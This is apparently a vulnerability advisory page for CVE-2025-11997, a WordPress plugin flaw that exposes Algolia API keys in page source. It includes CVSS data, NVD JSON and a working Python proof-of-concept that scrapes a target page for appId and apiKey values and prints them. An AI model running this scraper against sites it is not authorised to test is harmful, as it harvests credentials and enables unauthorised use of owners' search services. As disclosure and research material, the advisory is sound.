Security Vulnerability Report
CVE-2025-11997 CVSS 5.3 MEDIUM

CVE-2025-11997

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Document Pro Elementor – Documentation & Knowledge Base plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.9. This is due to the plugin exposing sensitive Algolia API keys through the frontend JavaScript code via wp_localize_script without proper access restrictions. This makes it possible for unauthenticated attackers to view sensitive API keys in the page source, which could be leveraged to make unauthorized API calls to the configured Algolia search service.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Document Pro Elementor plugin <= 1.0.9 (all versions up to and including 1.0.9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11997 PoC - Information Disclosure
# Description: Document Pro Elementor plugin exposes Algolia API keys via frontend JavaScript
#
# The script only performs one unauthenticated GET of the target page and
# pattern-matches the returned HTML; it never contacts the Algolia service.
import requests
from bs4 import BeautifulSoup
import re
import json

# Credential fields that wp_localize_script writes into the page. Each pattern
# expects the field name, a run of quote/space/colon characters, then a quoted value.
_APP_ID_RE = re.compile(r'["\']appId["\'\s:]+["\']([^"\']+)["\']', re.IGNORECASE)
_API_KEY_RE = re.compile(r'["\']apiKey["\'\s:]+["\']([^"\']+)["\']', re.IGNORECASE)

# Inline JS assignments that are reported verbatim (first 200 chars) but not parsed.
_INLINE_CONFIG_PATTERNS = (
    r'var\s+\w+\s*=\s*\{[^}]*appId[^}]*\}',
    r'window\.dpAlgolia\s*=\s*\{[^}]*\}',
    r'algoliaConfig\s*=\s*\{[^}]*\}',
)


def _mentions_algolia(text):
    """Return True when a script body contains 'algolia' (any case) or 'dpAlgolia'."""
    return 'algolia' in text.lower() or 'dpAlgolia' in text


def _collect_keys(soup, found):
    """Scan every <script> tag and record appId / apiKey values into *found*.

    Only scripts that mention Algolia are searched. When several scripts
    match, the value from the last one wins, as in a single-pass loop.

    Args:
        soup: parsed document (BeautifulSoup).
        found: dict that receives 'app_id' / 'api_key' entries.

    Returns:
        The same *found* dict, for chaining.
    """
    for tag in soup.find_all('script'):
        body = tag.string or ''
        if not _mentions_algolia(body):
            continue
        for field, pattern in (('app_id', _APP_ID_RE), ('api_key', _API_KEY_RE)):
            hit = pattern.search(body)
            if hit:
                found[field] = hit.group(1)
    return found


def _report_inline_configs(html):
    """Print every inline config assignment matched in the raw HTML, truncated to 200 chars."""
    for pattern in _INLINE_CONFIG_PATTERNS:
        for raw in re.findall(pattern, html, re.IGNORECASE | re.DOTALL):
            print(f"[+] Found potential config: {raw[:200]}...")


def _report_keys(found):
    """Print the extracted fields and return *found*, or report nothing found and return None."""
    if not found:
        print("[-] No Algolia keys found in page source")
        return None
    print("\n[+] SUCCESS! Exposed Algolia credentials found:")
    print(f" App ID: {found.get('app_id', 'N/A')}")
    print(f" API Key: {found.get('api_key', 'N/A')}")
    print("\n[!] These keys can be used to access Algolia API")
    return found


def exploit_cve_2025_11997(target_url):
    """
    Exploit for CVE-2025-11997
    Extracts sensitive Algolia API keys from WordPress page source

    Args:
        target_url: URL of the page to fetch with a plain GET (30 s timeout).

    Returns:
        dict with any of 'app_id' / 'api_key' that were matched, or None when
        the fetch did not return HTTP 200, nothing matched, or any exception
        was raised while fetching or parsing (the error is printed, not raised).
    """
    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-11997...")
    try:
        # Fetch the target page
        page = requests.get(target_url, timeout=30)
        if page.status_code != 200:
            print(f"[-] Failed to fetch page. Status: {page.status_code}")
            return None
        # Method 1: localized data inside <script> tags
        found = _collect_keys(BeautifulSoup(page.text, 'html.parser'), {})
        # Method 2: inline JS assignments anywhere in the raw HTML (reported only)
        _report_inline_configs(page.text)
        return _report_keys(found)
    except Exception as err:
        # Any failure is reported on stdout and swallowed so the caller sees None.
        print(f"[-] Error: {str(err)}")
        return None


def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-11997

    Returns:
        True when exploit_cve_2025_11997 returned a non-empty dict, else False.
    """
    print("[*] Checking if target is vulnerable...\n")
    vulnerable = bool(exploit_cve_2025_11997(target_url))
    verdict = (
        "\n[✓] Target is VULNERABLE to CVE-2025-11997"
        if vulnerable
        else "\n[✗] Target may NOT be vulnerable or plugin not installed"
    )
    print(verdict)
    return vulnerable


if __name__ == "__main__":
    import sys
    # First CLI argument is the target URL; otherwise the placeholder is used.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://example.com"  # Replace with target URL
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11997", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:45.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Document Pro Elementor – Documentation & Knowledge Base plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.9. This is due to the plugin exposing sensitive Algolia API keys through the frontend JavaScript code via wp_localize_script without proper access restrictions. This makes it possible for unauthenticated attackers to view sensitive API keys in the page source, which could be leveraged to make unauthorized API calls to the configured Algolia search service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/document-pro-elementor/tags/1.0.9/inc/Base/DPET_Enqueue.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/document-pro-elementor/tags/1.0.9/inc/Base/DPET_Enqueue.php#L85", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ac7455a-0c89-4f5b-84eb-b7cc87bce8d4?source=cve", "source": "[email protected]"}]}}